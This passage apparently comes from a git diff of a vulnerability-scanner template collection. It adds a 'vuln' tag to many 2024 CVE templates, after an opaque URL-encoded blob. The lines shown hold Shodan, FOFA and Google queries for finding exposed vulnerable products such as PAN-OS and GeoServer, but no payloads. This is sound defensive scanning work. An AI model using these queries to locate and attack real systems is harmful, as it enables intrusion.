Fdj%2F8Uv147SWGNLZGyYH8YFnK197ZNV%2Fx8U5nFNDppLWvhUueb87wmX6hQ%2BS8%2BXVQHBVDWKaIm7EGLU7S46sLs8zemShfo%2Bx4LYyAdUURvLXyfZX5np1qljRdk0yI6ro%2Bt2Q4lRsUdT6njr5mp0sxyMuTzwsM0iE7cvUU%2B9YqVVjp2vlriMzAKIxqKjPZF7YxUu28fMdg9esOX7LSd5EuMGrGK0S913TE1wKonHaA61hB%2FariE22cXU7laXhAtE6QSE3S9FCOo0lwcA%2BXovO7kuj%2B7yDm5J%2B9B34caK56ITXfsv%2BvF04%2F1ErJUkJyRboVrzS1kwouSSAds9tnCx0cYtVzClLBoe2OeBTdAT%2B1R7gaCZgEKWgk7G9R%2FyREa1Vf6uxBmYavKawpREYbkaeD5mRYXRv6x56%2BD%2BX2k6neCM23kLQ7JdZc2Gfu1adVeGWRqrMynd%2BeEsKcXRFZbZ%2B9zBVLn9uWDO1RyCrw0VEmRenCpqi%2FzQKJ%2BFXP5IoIFPR73b2YWJfXR1WMZxIIkusbGpJjC%2FAyw1ydhksw3y8ZYDnv3FkQaKMxWsTGxPwtAQpUK4GxBZusdxtaHzmbZuUL00CaLbxyVTst3%2FPq1DdsrW01EvYmui6JwVipUBTl%2FVKOznh7kTYogLT5Hh581tpas7Z4dQLM8EqJxZqWQPYNPsSeY8e4JBcSeTbS%2BrqhAxW8bUxm91lK%2B%2FsHhF9xI5pmH7ubtM9ABWBFfRQhEz8UALtaVw472bTLC4pM%2F%2B4jzaHeucYn8l7M%2BNu8BI6tq1x47gRCgaH8Ovt0dyFEegBGCHjeJi8RkYqINuPAMSYrvTX7L612IWDuKMnOvrDLNOuprNSGnw5T%2B4zS1hGZfCIidWdtDft8nH2Q4BLg1XOubDHBUR1ReUJaR0w6%2FTVQiacAns3lHWC4nm9mzHkzHn0kiTFtLcritYlmFLoPNU6y6Rpve1N7nVwKrFaoYmikaj0lkWkVUQ1z0dSttBpdE6A%2FLDOT2EOCbyCFemR5TsHmmYICJpzArGVm6sZQabOpP1Pmb3sISmHfkZuaPS3xJH56zfrfArWM6haPkLpjDWDmiguHcN5H6qS2dbSzgAJ06DhqE1WjKFVkyaEAUg0iHToOwMDGHae%2BmWHifXuZAfQwAGKEH8c0pNzFlVkV8In70qbO3BEjXY1XzAzJucxCJw6wkkRH0BGji5yzJltEpF48YNJFP7yXDuc4z4Ns7Vt9ylr8zoLBx7LSFjf2KO6oflkSCON3XcqQpMyJLQMt9YcdbBADXX3Qcn%2FyIx8swYXLy2JFQWBOBjxY7C7YtiCKxS7bKtec4xiPnCqlfc0TQtJs61ZhbsIj0BMeukFVeJKzUYjaoG8mNrqmcwNkXa4edAC%2FYziREDQObm07hJZqFkh9N5lUnCWBsyAkdpKoJuNoKlgnoC5GxFRoyCfaIVOXkCoKv1I1v%2BFxBwPtdknaoePjyrg5K%2FPsfyauyCTwvp5FhecSXNE%2BK0R0zJdvCqnmFtRwmXsUG%2Ffz%2Fyl0jBqUjV%2FdZlXwDObNvSNuF2DgI9UZoiVSOwxrDJxtyFzAo5haEC3HfLP4HZ1KT0jNRRH%2FD1HAaC8GfFsj4ne34g8abrdcYB49%2BTX4t71J1gyeMyFIepHRJ32jUv7BCFW0Mv%2FQ0WLyGzeGq7SCEMN%2BLQvb8C5EyAgg%2BPYuUZ8WgIQet1u%2FJtTCodjt64bLLtk6sDUUC7hGb2vxcpOeUTvVrrTsAOyvJLYxRyNHXhw%2BCbJN1M9Wylu5xZzX8Tt2dBK4sU5u%2Fi%2BbGvHhWUddaw2JesF1UtSVvvXfdmOeCCErWdhDOzh%2BW2aFwB1oEnzkcTFLYl9Htp5EpULJeUIqTVA%2FbQQsfnHIHHe2Qua0z7eA%2Be56LxIUwv%2FduYT53OwVnR9KO0Bk039%2FfDrtODnkoV%2FqW8zAKrKeFdxR2ZbnqAu2ZQVai6gH%2B2xK4ttpQkFvFoDSD6o7czsl0bNeWMxj6Tf69nUNax70sWXbQrua12oMIIAmwLmGJ0e1XcR3u9lNyDuJ7cvY1PCDO9yvTFGB%2BpZJ6Fd9jdKtZWaoVPV2xF3Pu8K8PQBV8hO8pjw9mqHHE1Ei9v33AN2nquGTAfQEltBXbEwcblYlDCyHK1VWFeOi%2BjMTETqngIonIkCXICQAawcUHPzaagRfqrhwyZ21CNxr3iJ6Wp8OEs8HUH4Pt7PzVff%2Fx%2BQ6MFp6LEPEUnVplOzDTo9FfxzaM%2F9S5Xi2ssYNGtJMnPJd1E1cUN4fLL6JQCk1h2Rn7LGcXMsNJJJ4NufoPDPTtn4ZmVqu1%2BlFbNnw%2F3xBUqEpEf2nAJDNUiRFIJapzc%2FPy7ilUJGMDsTJM1u8VfQZf7A7efWrHgsvPdr6LdrVq6ElBL438pZwMH%2BQGMB0FrWa7JwnLCL1XPmXdsmN0AC087xQ1iJPsvd0rzLyjZ4Phg3YIyytpkfUoYT8HhrcyKkb3I5HzzKW0A6cAG%2FgxWMfAuplnwmAuaCtuItiB5n6RPfm8SiR6WVSkJGPHGjoMnFyrM%2FhkFdWJ9JmZIyloMUm6tFNMY7%2B83oXAFmF9iV3moa6ZUpBiEvgf4F0OLJsdFxXi396fUPaYoYmNaL0JUIIzOT2YoEWQlEgSEkyeUAolCduXYzDqAKJbx%2BASNqujZmRl9HMKtMz1OwYxjPjbm9gZ%2F8VaQ6uSosRSQbks1zpeHZVAm4fcqhM9lKkXPL0eOub4Jv%2F5z1BcgnvKpuputzGDkDntkTmiFetdQdfcqYTnIO0zhRBRoWEhLnYaCTyhaPvjd%2BY7KL3JYeDokxUQcvXJT7M%2FrWlIq5LOB5%2BFTWwbRgmyTMRMzTzpn59uW4afFczdjIgCfYpxB8uM46PhwdBK3evxNGVCg6YLwh0wRzwrWJCdi71eg%2FrBrQbxHNJjvRn56gfV42T2mpXZbrY%2FApz31BfUIIgCb9gKUtOPGedbXUYi45eu8DQcgpICcFerjKGxgQjDd%2BValbmYDKu%2BUp9%2FXTPx%2B9A5d5tSk8YHFHD2WdpKEUavvWm53VV53RCdnPjuwZXghl6nB2orWPSqWBcnuCPV1%2Fef2gmZvRGs1kNZ93BzDNNS%2BWF9qeBwtDqNiw1srTE2c4RHDuY67MYD0bF1rm1xHfg5gotJOuN9h5U3bDTX9tdE8BFaDcI881PeRTozeZCXvzJJ%2F45hHS1dQ5xgaXPwZ4ox1gErZxYmkrq3Pz%2Fj3CRvyZXfOriQtWajS3EBbSk1LvL8XV%2FHibF8jLkhgKyITTsJW1IoCJPLHKisx%2BHrhwhSv3cRHeJjdYVUsU5gnA0bP1xB6D7AoI1TUpNXR7U0gaOx%2BVWWlO6wWossW3Qqer3r5AsyHldG3ZtwS4skdZH1cB3P%2BfLH4dx7cJR0TmsBHGMn555bww1jsYWefTOSmkB7cOlZu5Ek4QI9rMpRH7UVfNcCMhoSH1taMgw9HcvtDL0j%2BNsP7BMa3qa%2BmJfS7qo7sFQY%2FUf5ijir4vEzg1R1uRg%2BTE%2Fa7eZtPqYO53btLlwtKemcAviKROVwDEz8%2FfflwjB9v4%2BTKyIH3LKBx5JzMNUvVOLdM7IikfNwJukdnvNH64NhFAMh3uayPG3xX8mZRnMTeuq46iXIWbBYa2PpWaMIRQbF9sEVSw6Pd9DmCpcVpxEevKnnebOe9XAr7FNPwY7sjitzKEo%2B54meoICsDhzmNa7KseHF%2BxSuUanZdNZ9HprV52PYxqYuTxvHkxliOTKjR16sbZ9u1NfYBx5h1G%2FHXv3kesO3NoBsUKR8lGgGN6IcJH%2Fl%2BYAKk2SmXhKrU92m4EB8SNZsEbPO4UdPdaO%2FButfUVuontFOPSwvH1hEzjJWbYvAJ3Mr3O0w%2BOhjeuoeCRF5hO3SzPKdHIssf2723bgoRRQieDmqUk7jQdYJQ3nbsT%2FtY4pq0kQDraGDmwaaSfQeQz1STAkfmXoRi9oVgap9MuYDocldGzl070MO8SDC3ufkeItnQ2GASDKDjhRlnl4%2BArRjvco4FW7a2dEqMWUKcASmdQ%2BLxFw8%2FtcbgANgQNYUm20%2FXqVUjsXbokBmzMji5UOeZksMmnOhE2onA8TOCwWmoZx4dLECxBeEVX8tbutv1h5HIoOi3zxqTqw8E283YC9wbJAIoasd4EiJJOE%2Fzja4TpoywLz1ZwanGW4EMFIhxb%2BV5T4uhG9Hpngej3aBRQp%2BxGmu7rJxYH3JqDsDzhW3JeJ3LCoQmAZxs0umSvnVM%2F09k4aqoZSGoSOdOK4sTho9OasWym7f%2FnuEhrFt1n%2FVOz9bmMouP5JEEeGWDIh4XWdA9arOAAJY9K3vNQHq8ZZjiGhapHQkVqkG7QSp3kpppOA%2B8Rj8pAqW5wqBX9MV%2BnFeZ%2FknIBNO39IxrZpKajnG9RaDVr6JBNIbXGUe6EgIhzWVAubBA40XN9ENFkcUfFF5ArOEu1FrnvX%2Fg38OoGTvSMLxM2uq1mnoIOC9cw2xLTHXVC50h91AVr86EGu%2FnQJ5q169yG9vSJxDYdT%2FqYhh1YfxwxsJXSKJwghCklIZbF%2FKS0aMX2RzluI%2F4qfXv0zQg30mltYFgMO0cFKwYInisgjheIYjHuJabj5OBP86Sjj8DTFi9OpYZRKQ%2Fb2woP%2BEicTqE1vG3tlGmHPDs2mjX9HDtODx88%2FojDI14nPtOA1Znbo8rb3V5kHesncOfg6oPLb12%2BtRKhxYYNdNaQI7cA%2Ft%2F9wjGO620fkqIXOpaDPR1h3Vd7DvqK9vfkjO9h%2BHZ1SCjT%2BD%2BnaSdmdnUkmR37iejah7j1mrXqafTA9o7ZCw%2FBG7Pru8DMS%2Fbey8Ephu6VuDNvcBZiiqOglZuLzfZnOY3Wr7NYEOrHME5hnS6COnPkZuv5qXO%2FMvSSe04139VVTcvJ%2BcRNBeYebhPgCapcT1iGByuHr0lynOa%2BUFKqJu%2FmMrnyR%2BsM%2FdtE2h0f1L9Lm4tHRMDR5hWI0ZrJ6kOOHLoRCElWiFZRHv9SDwuS7rjf4u3D%2BqRgkF6CR42HXREfYbmEOsIQYGX0Zmtn87%2BYNcJnYTbleYqeEbDrTEWR%2BvXlSNK9VxcFMFi9D6domS%2BxBB5qDTLutnJBMfVmRaNESKHLPXbD%2BE7VrWUj9p9lzD9XXeSLmPWWBFKyr5mSTvL4aPMxNe3kY%2BMqAZTEbpAj1YLSQjvvYyYbvmtjnt%2BBhpz8dgzcUrO8cJw8vGp1OvEydxXpJNqgK4QsgjnLpDCOrNnjaFoooLzeY76o6GZ0tN%2BABwNXFLgDSnzLIhj1saopIJYFDKpzW4BDkno9Aht6zKjfgJp7nC7ksWzNUx27sAyGOeBqa6AkJiJc9GmHy88bMnetPD7Appx9gAIFhNKatp0BBcEreqkjhHPFzk%2FGb4qxpj%2FXQMijkajhzsrvC8c%2FmEnfytiyzKbg2aXH5GmDu4tsf6ICHMkgQZ2cbC72HSoKY4reTqFQc42HUMZVL8cymCH61tcEI1ZgvjHToDGCwzjQFe3mq5MRrqZ7yf2J8bUImmhWK9uiQ4h1fJN38M0nWIB%2Fk4ZJNPQj%2Ba24RyGvpxEF%2F2j4vzBLs2peTpZwb62jXnet3GMC56fE3kprkpzxIvLjJCTqTNIm4xdK7oKxGPgWtZdCGk4TWOse1UaKlkA4e0CFPImp%2FA9hJvg%2BXVOwp%2F580NF3ZMbosNYnoAHqDHDFoxXmPAnubicQZ08RTo0%2Filu%2BnmChMz%2BJ8uyO%2Bl6d8UHYXUOShZnyyQ9dnNBc60hcaEo3IVtNBEkhYQ7RrAyRpQed%2FHibP%2F5SQrgnnVjDYF1ZV0MXS86aFnRPFA2cRtM5zo0zukBVsICkRKNApr8BM9Hjm9Xr9gCYkB5E%2FXmBp%2B0DChJAlLk5GlwO7KJdj%2FC3a%2BYUEZZkDlTXnH4bYOXKbAa7MHZbvqoVIWYvupNe3XNmRKq6IsTJK21SIrlZwjzN3KykvQ0iHfw%2BpzgXVjKl7m0dThrWutAGMax15UYZjawKe0gFUIjROKxzGtJ8EPQ3odBz%2Bsf7ceUztwf3BTRnmuW3hXRpN%2BgNkwWhWm%2Bet2PXq6TpLpQFVJmNX0P3R9ESxvFxtTbGvo2Pt7OaqBeynBYitf%2FVoLB3MdtQmWiZXfjaMdXoROrdSB%2B9hlxIms7IkFhbzmlqXLfWKF3kZOminsVTFoYZhbr5nog7%2FLnSGMBiaNwK4ZiiQlcm5pVK896exfKGikKrk84eY0fMr6Dd98V9juumcUjvUnycd9AOq%2BEOiTZQ0zQJHHDQLDlb3qr4w9ZWjEL8J8js1YcZ63%2BeNcYbS5Mka7ols8aisfqO4C4r2uxTF%2F7%2BaVnavslcN%2F3fZ1RyS1lD1IOTm5Gss%2FDkiwHz%2FxPUQATfRQr6aD%2B2HV8U8EfMWWorNiB3U2db1hYWbYGX4MxGK%2BvVmR%2BhswRHys7A23BBo9kN2LHY2GFnWhPcTM6HJzitq00zkb85xf2NhFRd7hMSHcqLJvWOzAXsSDAHW%2B9SFgnhY8%2BM3VnQL%2F%2BE80ES1pEtsPe3lYeJEoj7lahsgXDKWjYA3Jf8ix5oF7TAsbe9p9ucnYwA6F6bY%2FHdOdihhHRez%2BS6KVN741WxX9Tigw5EcH%2BwShaI%2FA2aHps78ZdLq04MZWg7okF%2B9rzF3yFLPnibzt%2BWXtXANyPdlUDUFRRok5VPpfcSzpItdCMi%2BVPjy9%2BFKdHa17NcHPFnQVfqlrDpgfOyQ%2FyI87MY0f2qLMEw5g4x%2Fxapi3I%2FLEwk9ofRBRRoD2sqjQ3EU22%2B2M6eUyZFf1kfY4X8OIZs1fn62h%2BY%2B8pGpHw4BnSSebx1asu0nWXgaBNKCJZfmJHQd9Pf4ajDNgaJFxokG%2FnmiF6fdXeyCp7R5%2BOV0jZJ9cAE%2F%2FN0JZtSOFYo8W1eqlCiA9T4Mm%2FGKGSNXSJa1dxc%2FHhOWOal3K%2BSc38m7nT6cAF3f%2B7q8RuADujwfnOdcZa5eQu5wqRPMpohyGxwVJq7OKSZldtMQQMCNO9cWraGizFK01dtDDT80gCUUTjoWX5Gs61hDQgBNbZv9lCSqMFk4b4X1Xt9ZxVkjSgXqFSN23GvlA9LTJf2IC%2BvzxrL8J4twSabwN6Mk16qsJKXv9W0eqpG%2B418f6bh5nRa%2BbieUq4lO2h%2FxwXPOETagZGio9%2Fh702BxbaSt1HLz9%2FI1yyMFwx58qzea%2FFXfQ5h5HmYivqjOsc" diff --git a/http/cves/2024/CVE-2024-33113.yaml b/http/cves/2024/CVE-2024-33113.yaml index 0ce0d1aef70..b37d46d442f 100644 --- a/http/cves/2024/CVE-2024-33113.yaml +++ b/http/cves/2024/CVE-2024-33113.yaml @@ -19,7 +19,7 @@ info: shodan-query: "DIR-845L" product: dir-845l vendor: dlink - tags: cve,cve2024,dlink,info-leak + tags: cve,cve2024,dlink,info-leak,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-33288.yaml b/http/cves/2024/CVE-2024-33288.yaml index 5bd86a779e3..d3571c01b58 100644 --- a/http/cves/2024/CVE-2024-33288.yaml +++ b/http/cves/2024/CVE-2024-33288.yaml @@ -17,7 +17,7 @@ info: vendor: prison_management_system_project product: prison_management_system shodan-query: title:"Prison Management System" - tags: cve,cve2024,cms,sqli + tags: cve,cve2024,cms,sqli,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-33326.yaml b/http/cves/2024/CVE-2024-33326.yaml index b35f9fd4a20..cd2955747f2 100644 --- a/http/cves/2024/CVE-2024-33326.yaml +++ b/http/cves/2024/CVE-2024-33326.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: lumis product: lumis_experience_platform - tags: cve,cve2024,xss,lumis,lumisxp,vkev + tags: cve,cve2024,xss,lumis,lumisxp,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-33575.yaml b/http/cves/2024/CVE-2024-33575.yaml index 77b8a13c2cf..4ed550c740a 100644 --- a/http/cves/2024/CVE-2024-33575.yaml +++ b/http/cves/2024/CVE-2024-33575.yaml @@ -26,7 +26,7 @@ info: shodan-query: "http.html:/wp-content/plugins/user-meta/" fofa-query: "body=/wp-content/plugins/user-meta/" publicwww-query: "/wp-content/plugins/user-meta/" - tags: wpscan,cve,cve2024,user-meta,wordpress,wp-plugin,info-leak,User Meta,vkev + tags: wpscan,cve,cve2024,user-meta,wordpress,wp-plugin,info-leak,User Meta,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-33605.yaml b/http/cves/2024/CVE-2024-33605.yaml index 29770009576..f3e9efeb46b 100644 --- a/http/cves/2024/CVE-2024-33605.yaml +++ b/http/cves/2024/CVE-2024-33605.yaml @@ -26,7 +26,7 @@ info: shodan-query: "Set-Cookie: MFPSESSIONID=" product: mx-3550v_firmware vendor: sharp - tags: cve,cve2024,sharp,printer,traversal + tags: cve,cve2024,sharp,printer,traversal,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-33610.yaml b/http/cves/2024/CVE-2024-33610.yaml index 1d8f1cdf179..b1a7c860b14 100644 --- a/http/cves/2024/CVE-2024-33610.yaml +++ b/http/cves/2024/CVE-2024-33610.yaml @@ -24,7 +24,7 @@ info: verified: true max-request: 1 shodan-query: "Set-Cookie: MFPSESSIONID=" - tags: cve,cve2024,sharp,printer,exposure + tags: cve,cve2024,sharp,printer,exposure,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-33724.yaml b/http/cves/2024/CVE-2024-33724.yaml index c04b69fb376..28b83d21999 100644 --- a/http/cves/2024/CVE-2024-33724.yaml +++ b/http/cves/2024/CVE-2024-33724.yaml @@ -18,7 +18,7 @@ info: - html:"soplanning" - http.html:"soplanning" fofa-query: body="soplanning" - tags: packetstorm,cve,cve2024,authenticated,soplanning,xss + tags: packetstorm,cve,cve2024,authenticated,soplanning,xss,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-3378.yaml b/http/cves/2024/CVE-2024-3378.yaml index 8edff94f220..3d15383a882 100644 --- a/http/cves/2024/CVE-2024-3378.yaml +++ b/http/cves/2024/CVE-2024-3378.yaml @@ -29,7 +29,7 @@ info: shodan-query: html:"iboss-font.css" fofa-query: body="iboss-font.css" google-query: intext:"iboss-font.css" - tags: cve,cve2024,iboss,xss,intrusive,vkev + tags: cve,cve2024,iboss,xss,intrusive,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-33832.yaml b/http/cves/2024/CVE-2024-33832.yaml index 5bfc623489f..5a628fe260a 100644 --- a/http/cves/2024/CVE-2024-33832.yaml +++ b/http/cves/2024/CVE-2024-33832.yaml @@ -21,7 +21,7 @@ info: product: onenav fofa-query: icon_hash="1111283449" shodan-query: http.favicon.hash:1111283449 - tags: cve,cve2024,ssrf,onenav,oast,authenticated + tags: cve,cve2024,ssrf,onenav,oast,authenticated,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-3400.yaml b/http/cves/2024/CVE-2024-3400.yaml index 535c8eaceab..cca7386896a 100644 --- a/http/cves/2024/CVE-2024-3400.yaml +++ b/http/cves/2024/CVE-2024-3400.yaml @@ -30,7 +30,7 @@ info: - http.favicon.hash:"-631559155" - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" fofa-query: "icon_hash=\"-631559155\"" - tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev,intrusive,paloaltonetworks,vkev + tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev,intrusive,paloaltonetworks,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-34061.yaml b/http/cves/2024/CVE-2024-34061.yaml index 67dcdb419bb..137da1d0534 100644 --- a/http/cves/2024/CVE-2024-34061.yaml +++ b/http/cves/2024/CVE-2024-34061.yaml @@ -20,7 +20,7 @@ info: verified: true max-request: 2 shodan-query: html:"Change Detection" - tags: cve,cve2024,changedetection,xss + tags: cve,cve2024,changedetection,xss,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-34102.yaml b/http/cves/2024/CVE-2024-34102.yaml index 7595a1ae6e2..70ad8c8dc33 100644 --- a/http/cves/2024/CVE-2024-34102.yaml +++ b/http/cves/2024/CVE-2024-34102.yaml @@ -23,7 +23,7 @@ info: fofa-query: app="Adobe-Magento" product: magento vendor: adobe - tags: cve,cve2024,adobe,magento,xxe,kev,vkev + tags: cve,cve2024,adobe,magento,xxe,kev,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-34257.yaml b/http/cves/2024/CVE-2024-34257.yaml index 6827ec511a8..aa83b9b475a 100644 --- a/http/cves/2024/CVE-2024-34257.yaml +++ b/http/cves/2024/CVE-2024-34257.yaml @@ -19,7 +19,7 @@ info: shodan-query: http.title:"totolink" fofa-query: title="totolink" google-query: intitle:"totolink" - tags: cve,cve2024,rce,unauth,vkev + tags: cve,cve2024,rce,unauth,vkev,vuln variables: file: "{{rand_base(6)}}" diff --git a/http/cves/2024/CVE-2024-34351.yaml b/http/cves/2024/CVE-2024-34351.yaml index 628599213f3..a63ec34666f 100644 --- a/http/cves/2024/CVE-2024-34351.yaml +++ b/http/cves/2024/CVE-2024-34351.yaml @@ -27,7 +27,7 @@ info: - http.html:"/_next/static" - cpe:"cpe:2.3:a:zeit:next.js" fofa-query: body="/_next/static" - tags: cve,cve2024,vercel,nextjs,ssrf + tags: cve,cve2024,vercel,nextjs,ssrf,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-34470.yaml b/http/cves/2024/CVE-2024-34470.yaml index acf4f32115a..1b18f4ece61 100644 --- a/http/cves/2024/CVE-2024-34470.yaml +++ b/http/cves/2024/CVE-2024-34470.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 2 fofa-query: "mailinspector/public" - tags: cve,cve2024,lfi,mailinspector,hsc + tags: cve,cve2024,lfi,mailinspector,hsc,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-3495.yaml b/http/cves/2024/CVE-2024-3495.yaml index 8e87e63d716..7b1ce241bca 100644 --- a/http/cves/2024/CVE-2024-3495.yaml +++ b/http/cves/2024/CVE-2024-3495.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 2 publicwww-query: "/wp-content/plugins/country-state-city-auto-dropdown" - tags: cve,cve2024,wp,wp-plugin,wordpress,sqli + tags: cve,cve2024,wp,wp-plugin,wordpress,sqli,vuln variables: num: "999999999" diff --git a/http/cves/2024/CVE-2024-34982.yaml b/http/cves/2024/CVE-2024-34982.yaml index 4d7507ad1ca..ce37520591d 100644 --- a/http/cves/2024/CVE-2024-34982.yaml +++ b/http/cves/2024/CVE-2024-34982.yaml @@ -20,7 +20,7 @@ info: vendor: lylme product: lylme_spage fofa-query: icon_hash="-282504889" - tags: cve,cve2024,lylme-spage,rce,intrusive + tags: cve,cve2024,lylme-spage,rce,intrusive,vuln variables: string: "{{randstr}}" diff --git a/http/cves/2024/CVE-2024-35219.yaml b/http/cves/2024/CVE-2024-35219.yaml index d30e5d115e6..203cf5836f5 100644 --- a/http/cves/2024/CVE-2024-35219.yaml +++ b/http/cves/2024/CVE-2024-35219.yaml @@ -22,7 +22,7 @@ info: metadata: max-request: 2 verified: true - tags: cve,cve2024,openapi,intrusive,lfi,vkev + tags: cve,cve2024,openapi,intrusive,lfi,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-35286.yaml b/http/cves/2024/CVE-2024-35286.yaml index 0fcb8459ab9..8ffb29807bd 100644 --- a/http/cves/2024/CVE-2024-35286.yaml +++ b/http/cves/2024/CVE-2024-35286.yaml @@ -23,7 +23,7 @@ info: vendor: mitel product: micollab shodan-query: html:"Mitel" html:"MiCollab" - tags: cve,cve2024,mitel,micollab,sqli,vkev + tags: cve,cve2024,mitel,micollab,sqli,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-3552.yaml b/http/cves/2024/CVE-2024-3552.yaml index 49cc2e2e15c..c9737843897 100644 --- a/http/cves/2024/CVE-2024-3552.yaml +++ b/http/cves/2024/CVE-2024-3552.yaml @@ -20,7 +20,7 @@ info: vendor: salephpscripts product: web_directory_free publicwww-query: "/wp-content/plugins/web-directory-free" - tags: time-based-sqli,cve,cve2024,wordpress,wp-plugin,wpscan,wp,web-directory-free + tags: time-based-sqli,cve,cve2024,wordpress,wp-plugin,wpscan,wp,web-directory-free,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-35584.yaml b/http/cves/2024/CVE-2024-35584.yaml index 9637de4fe50..42209a9cec1 100644 --- a/http/cves/2024/CVE-2024-35584.yaml +++ b/http/cves/2024/CVE-2024-35584.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.title:"opensis" fofa-query: title="opensis" google-query: intitle:"opensis" - tags: cve,cve2024,opensis,authenticated,sqli + tags: cve,cve2024,opensis,authenticated,sqli,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-35627.yaml b/http/cves/2024/CVE-2024-35627.yaml index be3074cc1da..e5f461f0d0d 100644 --- a/http/cves/2024/CVE-2024-35627.yaml +++ b/http/cves/2024/CVE-2024-35627.yaml @@ -19,7 +19,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1258058404 - tags: cve,cve2024,tileserver,xss + tags: cve,cve2024,tileserver,xss,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-36104.yaml b/http/cves/2024/CVE-2024-36104.yaml index 0783c48527e..0b880b0d5e5 100644 --- a/http/cves/2024/CVE-2024-36104.yaml +++ b/http/cves/2024/CVE-2024-36104.yaml @@ -36,7 +36,7 @@ info: - body="apache ofbiz" - title="ofbiz" google-query: intitle:"ofbiz" - tags: cve,cve2024,apache,ofbiz,lfi,vkev + tags: cve,cve2024,apache,ofbiz,lfi,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-36117.yaml b/http/cves/2024/CVE-2024-36117.yaml index ea0db454ad9..3fab1acb4df 100644 --- a/http/cves/2024/CVE-2024-36117.yaml +++ b/http/cves/2024/CVE-2024-36117.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:1212523028 - tags: cve,cve2024,reposilite,lfi,vkev + tags: cve,cve2024,reposilite,lfi,vkev,vuln variables: javadoc_path: "releases/javadoc/1.0.0/" diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml index 8a22cb21d8a..36c1991f19b 100644 --- a/http/cves/2024/CVE-2024-36401.yaml +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -26,7 +26,7 @@ info: - title="geoserver" - app="geoserver" google-query: intitle:"geoserver" - tags: cve,cve2024,geoserver,rce,unauth,kev,vkev + tags: cve,cve2024,geoserver,rce,unauth,kev,vkev,vuln flow: | if(http(1)) diff --git a/http/cves/2024/CVE-2024-36404.yaml b/http/cves/2024/CVE-2024-36404.yaml index dc1b9f0d338..efab888ee71 100644 --- a/http/cves/2024/CVE-2024-36404.yaml +++ b/http/cves/2024/CVE-2024-36404.yaml @@ -32,7 +32,7 @@ info: - app="geoserver" - icon_hash="97540678" - body="/geoserver/" - tags: cve,cve2024,geoserver,rce + tags: cve,cve2024,geoserver,rce,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-36412.yaml b/http/cves/2024/CVE-2024-36412.yaml index e78526cbca2..cd567acd881 100644 --- a/http/cves/2024/CVE-2024-36412.yaml +++ b/http/cves/2024/CVE-2024-36412.yaml @@ -26,7 +26,7 @@ info: product: suitecrm shodan-query: title:"SuiteCRM" fofa-query: title="SuiteCRM" - tags: time-based-sqli,cve,cve2024,suitecrm,sqli + tags: time-based-sqli,cve,cve2024,suitecrm,sqli,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-36527.yaml b/http/cves/2024/CVE-2024-36527.yaml index 1c30cc9ecec..1d33f1aa386 100644 --- a/http/cves/2024/CVE-2024-36527.yaml +++ b/http/cves/2024/CVE-2024-36527.yaml @@ -16,7 +16,7 @@ info: metadata: max-request: 1 verified: true - tags: cve,cve2024,puppeteer-renderer + tags: cve,cve2024,puppeteer-renderer,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-3656.yaml b/http/cves/2024/CVE-2024-3656.yaml index 27037034210..c55e67046a5 100644 --- a/http/cves/2024/CVE-2024-3656.yaml +++ b/http/cves/2024/CVE-2024-3656.yaml @@ -33,7 +33,7 @@ info: - body="keycloak" - title="keycloak" google-query: intitle:"keycloak" - tags: cve,cve2024,keycloak,auth-bypass,authenticated + tags: cve,cve2024,keycloak,auth-bypass,authenticated,vuln variables: username: "{{username}}" diff --git a/http/cves/2024/CVE-2024-36675.yaml b/http/cves/2024/CVE-2024-36675.yaml index 01109c62519..4e3e0b61d60 100644 --- a/http/cves/2024/CVE-2024-36675.yaml +++ b/http/cves/2024/CVE-2024-36675.yaml @@ -24,7 +24,7 @@ info: product: lylme_spage fofa-query: title="LyLme Spage" shodan-query: http.favicon.hash:-282504889 - tags: cve,cve2024,ssrf,lylme,spage,oast,oob,vkev + tags: cve,cve2024,ssrf,lylme,spage,oast,oob,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-36683.yaml b/http/cves/2024/CVE-2024-36683.yaml index 02ce32555a2..d62abb3b4c2 100644 --- a/http/cves/2024/CVE-2024-36683.yaml +++ b/http/cves/2024/CVE-2024-36683.yaml @@ -24,7 +24,7 @@ info: framework: prestashop shodan-query: html:"/productsalert" fofa-query: body="/productsalert" - tags: time-based-sqli,cve,cve2023,prestashop,sqli,productsalert + tags: time-based-sqli,cve,cve2023,prestashop,sqli,productsalert,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-3673.yaml b/http/cves/2024/CVE-2024-3673.yaml index 8be938310b4..60d7f622101 100644 --- a/http/cves/2024/CVE-2024-3673.yaml +++ b/http/cves/2024/CVE-2024-3673.yaml 